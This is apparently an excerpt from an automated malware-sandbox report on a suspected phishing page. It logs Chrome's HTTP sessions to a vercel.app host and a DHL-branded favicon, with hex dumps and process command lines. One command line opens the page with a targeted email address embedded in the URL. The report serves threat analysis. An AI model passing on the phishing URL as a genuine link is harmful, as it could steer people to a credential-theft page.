                          Data Ascii: y}k}~|M'8CTo+[WUQr'\'tTYwz.D=W|~q=_yMktbS=2|yN_}OetLS6q`Cjf3#?z1H]\"W]O;2'@@~tG:{u7m1
                          2024-07-09 09:33:24 UTC13345INData Raw: 6d 8d bb a3 73 db 6b bc df b6 ba e7 a3 ef 88 70 5b 0c 82 cd 07 68 86 3d 4d 8f f6 a6 a8 6f 65 6b dc 8b 8d 2b cb 78 ec 43 5c 10 fd 86 22 4a 92 a4 df 36 0f da 7c c0 9d 04 bd eb fe 43 6d cf 6d 92 7b cf 4f cc 45 7c 1e 3d 56 78 ec 7b f5 e0 83 bf b2 d6 ba 7f 99 3a 1f 9e 69 7a 78 ad 5e ed 31 f7 6b 43 85 37 4b 9b db 51 26 b8 ba 2b 32 9c a8 c9 e1 b1 ef 17 ed 7f f9 ab b4 75 5c dc da 8f cf 46 3e 8e c7 07 3e 1d c4 0a de aa 2d d1 ea 5d 50 db 11 ed 5d a5 c8 42 92 03 1a f2 d8 56 f4 d5 7f f7 47 2a d2 bd 5a cd 82 68 3b 8c 03 b1 19 c4 68 f4 6a 1f c5 d6 b9 6d d3 03 8d 2b 1f 44 1f 3e d4 79 bd 1b c8 71 bf 1b 70 14 88 66 77 e5 e4 1c f4 81 e3 39 e7 a3 6f dc ef c2 f3 e6 e0 ff 21 da 0e a3 41 6c d6 28 ed ad 0c ce 44 66 ee 25 79 36 ac 68 13 41 10 23 83 e6 ff d8 06 be da f4 86 a5 b7
                          Data Ascii: mskp[h=Moek+xC\"J6|Cmm{OE|=Vx{:izx^1kC7KQ&+2u\F>>-]P]BVG*Zh;hjm+D>yqpfw9o!Al(Df%y6hA#


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.74972599.86.4.124432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:26 UTC631OUTGET /e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico HTTP/1.1
                          Host: cdn.glitch.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://jd-amber.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:26 UTC425INHTTP/1.1 301 Moved Permanently
                          Content-Length: 0
                          Connection: close
                          Date: Tue, 09 Jul 2024 09:33:27 GMT
                          Location: https://cdn.glitch.me/e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico
                          Server: AmazonS3
                          X-Cache: Miss from cloudfront
                          Via: 1.1 507b5edb20d0e1a0b73c8687f53defa8.cloudfront.net (CloudFront)
                          X-Amz-Cf-Pop: FRA6-C1
                          X-Amz-Cf-Id: KQIvTrOKrU4ZMbMGuZwQJ6ua2zcDI5Ke_Uxxd1UY_k83XI4lOjgdEw==
                          Vary: Origin


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.74972718.66.102.464432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:28 UTC630OUTGET /e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico HTTP/1.1
                          Host: cdn.glitch.me
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://jd-amber.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:28 UTC519INHTTP/1.1 200 OK
                          Content-Type: image/x-icon
                          Content-Length: 2734
                          Connection: close
                          Date: Tue, 09 Jul 2024 09:33:29 GMT
                          Cache-Control: max-age=31536000
                          Last-Modified: Sun, 28 Feb 2021 07:50:36 GMT
                          ETag: "1db617fc614c1df23a9c90548582b8c4"
                          Server: AmazonS3
                          X-Cache: Miss from cloudfront
                          Via: 1.1 3aad72975c9da06e6d0903ad874f0b54.cloudfront.net (CloudFront)
                          X-Amz-Cf-Pop: FRA56-P2
                          X-Amz-Cf-Id: p_JVvrBEXgop_iFfWfjBRlPZZF7rIu_XK-syRVsPpedHv1YHNDwiNg==
                          Content-Security-Policy: script-src 'none'
                          Vary: Origin
                          2024-07-09 09:33:28 UTC2734INData Raw: 00 00 01 00 03 00 30 30 10 00 01 00 04 00 68 06 00 00 36 00 00 00 20 20 10 00 01 00 04 00 e8 02 00 00 9e 06 00 00 10 10 10 00 01 00 04 00 28 01 00 00 86 09 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 04 00 00 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 c5 fe 00 10 08 d5 00 0e 21 da 00 0d 35 de 00 02 af f9 00 00 cc ff 00 01 ba fb 00 06 85 f0 00 03 a2 f6 00 04 99 f4 00 0b 48 e3 00 09 61 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55
                          Data Ascii: 00h6 ((0`!5HaUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.74973018.66.102.854432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:29 UTC391OUTGET /e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico HTTP/1.1
                          Host: cdn.glitch.me
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:29 UTC526INHTTP/1.1 200 OK
                          Content-Type: image/x-icon
                          Content-Length: 2734
                          Connection: close
                          Date: Tue, 09 Jul 2024 09:33:29 GMT
                          Cache-Control: max-age=31536000
                          Last-Modified: Sun, 28 Feb 2021 07:50:36 GMT
                          ETag: "1db617fc614c1df23a9c90548582b8c4"
                          Server: AmazonS3
                          X-Cache: Hit from cloudfront
                          Via: 1.1 44b457512f742b4e48fc7f0c87d8ed92.cloudfront.net (CloudFront)
                          X-Amz-Cf-Pop: FRA56-P2
                          X-Amz-Cf-Id: QMYFwr7PWrNQ22IvOXWnRTAbmlYn6g8MUCU_Na_4j-pPzkOfgT58Bw==
                          Age: 1
                          Content-Security-Policy: script-src 'none'
                          Vary: Origin
                          2024-07-09 09:33:29 UTC2734INData Raw: 00 00 01 00 03 00 30 30 10 00 01 00 04 00 68 06 00 00 36 00 00 00 20 20 10 00 01 00 04 00 e8 02 00 00 9e 06 00 00 10 10 10 00 01 00 04 00 28 01 00 00 86 09 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 04 00 00 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 c5 fe 00 10 08 d5 00 0e 21 da 00 0d 35 de 00 02 af f9 00 00 cc ff 00 01 ba fb 00 06 85 f0 00 03 a2 f6 00 04 99 f4 00 0b 48 e3 00 09 61 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55
                          Data Ascii: 00h6 ((0`!5HaUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.74970576.76.21.934432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:34 UTC693OUTGET / HTTP/1.1
                          Host: jd-amber.vercel.app
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Dest: document
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          If-None-Match: "24c5e3908ab5a78f2209cc7da1a0608a"
                          2024-07-09 09:33:35 UTC226INHTTP/1.1 304 Not Modified
                          Cache-Control: public, max-age=0, must-revalidate
                          Date: Tue, 09 Jul 2024 09:33:35 GMT
                          Server: Vercel
                          X-Vercel-Cache: HIT
                          X-Vercel-Id: iad1::nbtv7-1720517615807-4363536a1754
                          Connection: close


                          Click to jump to process

                          Click to jump to process

                          Click to jump to process

                          Target ID:5
                          Start time:05:33:11
                          Start date:09/07/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Imagebase:0x7ff6c4390000
                          File size:3'242'272 bytes
                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:7
                          Start time:05:33:17
                          Start date:09/07/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2220,i,4837317040254672511,15702129655895526874,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Imagebase:0x7ff6c4390000
                          File size:3'242'272 bytes
                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:12
                          Start time:05:33:19
                          Start date:09/07/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jd-amber.vercel.app/#helco2024152@hdel.co.kr"
                          Imagebase:0x7ff6c4390000
                          File size:3'242'272 bytes
                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          No disassembly